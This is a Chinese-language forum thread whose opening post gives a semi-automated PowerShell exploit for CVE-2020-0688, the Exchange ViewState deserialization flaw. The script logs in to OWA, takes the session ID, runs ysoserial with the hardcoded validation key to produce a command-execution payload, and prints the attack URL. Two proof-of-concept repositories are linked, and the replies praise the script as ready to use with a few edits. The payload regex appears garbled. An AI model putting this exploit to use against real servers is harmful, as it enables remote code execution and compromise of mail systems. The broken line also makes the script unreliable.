CVE-2020-0688 powershell 半自动版
内容来自于一个朋友需要修改的部分:
$target='https://192.168.137.2'
$username='jerry'
$pass='Admin12345'
$command='calc.exe'
ysoserial.exe 放当前目录
$target='https://192.168.137.2'
$username='jerry'
$pass='Admin12345'
$command='calc.exe'
::ServerCertificateValidationCallback = { $true }
$destination=::EscapeDataString($target)
$response= Invoke-WebRequest -Uri "$target/owa/auth.owa" -Method "POST" -Headers @{"User-Agent"="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"; "Sec-Fetch-Dest"="document"; "Accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"; "Sec-Fetch-Site"="same-origin"; "Sec-Fetch-Mode"="navigate"; "Accept-Encoding"="gzip, deflate, br"; "Accept-Language"="zh-CN,zh;q=0.9,en;q=0.8";} -ContentType "application/x-www-form-urlencoded" -Body "destination=$destination%2Fecp%2Fdefault.aspx&flags=4&forcedownlevel=0&username=$username&password=$pass&passwordText=&isUtf8=1"
$Headers= $response.Headers
$cookie=$Headers['Set-cookie'] -match 'ASP.NET_SessionId=([\w\d-]+)'
$ASP_NET_SessionId=$Matches
$VIEWSTATEGENERATOR='B97B4E27'
$validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'
write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$ASP_NET_SessionId`" --isdebug -–islegacy"
$yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$ASP_NET_SessionId`" --isdebug –-islegacy
$generator=$yso -match "^(?:{4})*(?:{2}==|{3}=)?$"
$ViewState=$response.Forms.Fields.__VIEWSTATE
write-host "$target/ecp/default.aspx?__VIEWSTATEGENERATOR=$generator&__VIEWSTATE=$ViewState"
另外附加2个poc:
https://github.com/Jumbo-WJB/CVE-2020-0688
https://github.com/random-robbie/cve-2020-0688
Re: CVE-2020-0688 powershell 半自动版
谢谢分享这个CVE-2020-0688的半自动化利用脚本,思路很清晰。不过在测试时记得把 `$target`、`$username`、`$pass` 和 `$command` 替换成实际环境的值,另外ysoserial.exe要放在当前目录下。脚本里获取ViewState和拼接URL的逻辑挺实用的,也感谢附带的两个POC仓库链接,方便进一步参考。使用前建议确认目标是否受此漏洞影响,并遵守相关法律法规,只在授权环境中进行测试。Re: CVE-2020-0688 powershell 半自动版
感谢分享这个CVE-2020-0688的利用脚本,看起来是针对Exchange的ViewState反序列化漏洞。提供的半自动Powershell脚本把登录、获取session和调用ysoserial生成payload的过程整合了,对测试环境挺方便的。文末附的两个GitHub仓库也值得参考。不过使用时记得先在可控环境验证,注意修改目标地址、凭据和命令,以及确保ysoserial.exe在正确路径。thanks again。Re: CVE-2020-0688 powershell 半自动版
感谢分享!这个半自动化的利用脚本比较直观,修改几个参数就能用,很适合快速测试。另外附的两个 PoC 链接也很有参考价值,GitHub 上那个仓库应该有很多细节可以跟进。想问问你朋友在实际环境里跑过吗?有没有遇到什么坑需要注意?
页:
[1]